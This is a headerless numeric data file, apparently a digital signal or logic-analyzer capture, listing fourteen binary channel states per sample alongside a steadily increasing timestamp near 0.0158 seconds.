0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5833516e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5833564e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5833588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833596e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833636e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833664e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833688e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833716e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833740e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833764e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833788e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833812e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833836e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833864e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833888e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5833892e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5833940e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5833964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5833972e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5833988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834012e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834064e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834088e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5834116e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5834164e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5834188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834196e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834236e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834264e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834288e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834316e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834388e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,1.5834392e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5834396e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5834436e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5834464e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,1.5834468e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834472e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834488e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5834516e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5834564e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5834588e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834596e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834612e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834636e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834664e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834688e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5834692e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5834716e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5834740e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,1.5834744e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834748e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834812e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834864e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834888e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834916e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5834964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5834988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835036e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835064e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835088e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835116e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835188e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5835192e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5835236e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5835264e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,1.5835268e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835272e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835288e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5835316e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5835364e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5835388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835396e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835464e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835488e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835516e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835540e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835588e-02 0,0,0,1,0,0,0,0,0,1,0,0,0,0,1.5835592e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5835596e-02 0,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5835636e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5835664e-02 0,0,0,1,0,1,0,0,0,0,0,0,0,0,1.5835668e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835672e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835688e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835716e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835740e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835764e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835788e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835812e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835864e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835888e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835916e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835940e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5835964e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5835988e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5836012e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5836036e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5836064e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5836088e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5836116e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5836140e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5836164e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5836188e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5836212e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5836236e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5836264e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5836288e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5836316e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5836340e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5836364e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5836388e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5836412e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5836436e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5836464e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5836488e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5836512e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5836516e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,1.5960864e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,1.5961100e-02 1,0,0,1,0,1,0,0,0,1,0,1,0,1,1.5961132e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,1.5961156e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,1,1.5961464e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,1.5961488e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,1,1.5961492e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,1.5961496e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,1.5961540e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,1.5961564e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,1.5961612e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,1.5961636e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,1.5961692e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,1.5961716e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5961764e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5961788e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5961796e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5961812e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5961836e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5961844e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5961864e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5961888e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5961892e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5961916e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5961940e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,1.5961944e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5961948e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5961988e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962012e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5962064e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962088e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5962140e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962164e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5962212e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962236e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5962244e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5962264e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5962288e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962296e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5962316e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962336e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5962344e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5962364e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5962388e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962396e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5962436e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962464e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5962516e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962536e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5962588e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962612e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5962664e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962688e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5962692e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5962716e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5962736e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962748e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5962764e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962788e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,1.5962792e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5962796e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5962812e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5962836e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962844e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5962892e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962916e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5962964e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5962988e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963036e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963064e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963116e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963136e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5963144e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5963164e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5963188e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963196e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963212e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963236e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963264e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963288e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963316e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963340e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963364e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963392e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963416e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963440e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963468e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963492e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963516e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963540e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963564e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963588e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963644e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,1.5963668e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5963672e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5963716e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5963740e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963748e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963792e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963816e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963868e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963892e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5963940e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5963964e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5963972e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5963992e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5964016e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,1.5964020e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964024e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964044e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964068e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964092e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964116e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964140e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964164e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964192e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964216e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964240e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5964268e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5964316e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5964340e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964348e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964364e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964388e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964416e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964440e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5964444e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5964468e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5964492e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964500e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964540e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964564e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964616e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964644e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964692e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964716e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964764e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964792e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5964796e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5964816e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5964840e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964848e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964868e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964892e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964916e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964940e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5964964e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5964988e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965016e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965040e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965068e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965092e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965116e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965140e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965172e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965196e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965220e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965244e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5965248e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5965296e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5965324e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5965348e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5965372e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965380e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965420e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965444e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965496e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965524e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965596e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,1.5965600e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5965604e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5965620e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5965644e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965652e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965672e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965696e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965748e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965796e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965820e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5965872e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965896e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5965900e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5965948e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5965972e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5965980e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966020e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966044e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966096e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966124e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966172e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966200e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966224e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966276e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966300e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966372e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5966380e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5966424e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5966448e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966456e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966500e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966524e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966596e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966624e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966648e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5966652e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5966700e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5966724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966732e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966748e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966772e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966796e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966824e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966848e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966876e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5966900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5966924e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5966928e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5966972e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5966996e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967004e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5967024e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967048e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5967052e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5967100e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5967124e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967132e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5967148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967172e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5967196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967224e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5967248e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5967276e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5967300e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5967324e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967332e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5967372e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967396e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5967424e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967448e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5967452e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5967476e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5967500e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,1.5967504e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967508e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5967548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967572e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5967624e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967648e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5967700e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967724e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5967772e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967796e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5967804e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5967824e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5967848e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967856e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5967876e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,1.5967900e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5967904e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5967948e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5967972e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5967980e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968004e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968024e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968048e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968076e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968100e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968124e-02 